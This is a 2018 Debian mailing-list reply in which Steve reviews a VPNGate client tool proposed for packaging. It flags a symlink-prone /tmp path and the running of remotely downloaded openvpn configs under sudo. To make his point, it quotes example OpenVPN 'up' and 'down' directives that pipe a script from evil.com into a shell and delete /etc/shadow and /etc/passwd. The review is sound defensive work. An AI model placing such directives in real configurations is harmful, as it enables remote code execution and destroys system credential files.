On Mon Feb 19, 2018 at 12:44:40 +0100, Michael Meskes wrote: > > * It relies upon the external VPNGate.net site/service. If this > > goes away in the lifetime of a stable Debian release users will > > be screwed. > > That is actually a good point. I wonder if using a local copy might be > a good alternative.
If you're willing to maintain such a list, resyncing it every few days/months to reap dead-entries and add new ones then that would be good. > > * It allows security attacks against the local system, which other > > users on the host could exploit via symlink attacks on > > /tmp/openvpnconf > > True, but this could be handled by using a better system to access a > temp file. Sure. If you changed the code to use ioutil.TempFile, or some other secure alternative that specific objection will go away. > > 1. The tool downloads a remote URL to /tmp/openvpnconf > > > > 2. The file is then given as an argument to the command: > > sudo openvpn /tmp/openvpnconf > > > > 3. That generated/downloaded openvpn configuration file could > > be written to do anything, up to and including `rm -rf /`. > > Can you actually get openvpn to do this? Yes. For example these snippets will do what you fear they will: script-security 2 up curl http://evil.com/root-me.sh | sh up rm /etc/shadow down rm -f /etc/passwd > I read this not as "insecure for the system it runs on" but "insecure > on the connection side". This is certainly not something you should use > to open your local network to, or to do something illegal. As per the insecure fixed name, and the execution of commands from a remote HTTP-site (not even SSL!) I think it is insecure in all regards. Also I guess you'll need to change the script to remove "sudo", or better yet add a restricted user with sudo's nopasswd setup for it (shudder). Steve -- https://www.steve.org.uk/